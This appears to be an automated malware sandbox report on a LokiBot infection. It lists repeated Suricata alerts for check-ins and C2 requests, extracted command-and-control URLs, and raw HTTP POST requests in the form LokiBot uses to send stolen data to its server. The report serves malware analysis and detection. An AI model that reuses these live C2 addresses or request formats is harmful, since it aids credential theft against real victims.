                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64411 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64411 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64411 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64358 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64358 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64427 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64427 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64427 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64439 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64439 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64358
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64439 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64427 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64427 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64427
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64439 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64434 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64434 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49715 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64385
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64397 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64434 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64434 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64440 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64438 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64438 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64441
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64438 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64355 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64355 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64438 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64355 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64438 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64371 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64397
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64355 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64355 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64355
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64411 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64411 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64440 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64418 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64399 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64418 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64399 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64418 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64359 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64359 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64440 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64440 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49713
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64359 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64440
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64446 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64359 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64446 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64359 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64371 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64439 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64418 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64399 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64371 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64383 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64446 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64399 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64434
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64370 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64370 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64370 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64438
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64370 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64370 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64371 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64371 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64447 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64447 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64447 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64370
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64446 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64446 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64447 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64447 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64399 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64446
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64447
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64383 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64383 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64381 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64381 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64381 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64383
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64401 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64411
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64428
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64401 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64381 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64401 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64381 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64359
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64414 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64418 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64399
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64439
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64413 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64366 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64401 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64401 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64366 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64366 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64401
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64414 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64429 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64414 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64373
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64419 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64419 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64419 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64414 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64414 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64419 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64419 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64378 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64378 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64378 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64419
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64418
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64378 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64378 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64378
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64381
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64414
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64448 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64448 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64448 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64448 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64448 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64406 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64406 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64448
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64429 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64429 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64429 -> 45.149.241.169:80
                    Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                    Source: Malware configuration extractorURLs: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
                    Source: unknownDNS query: name: freighteighttwocam.ddns.net
                    Source: global trafficHTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: UUNETUS UUNETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
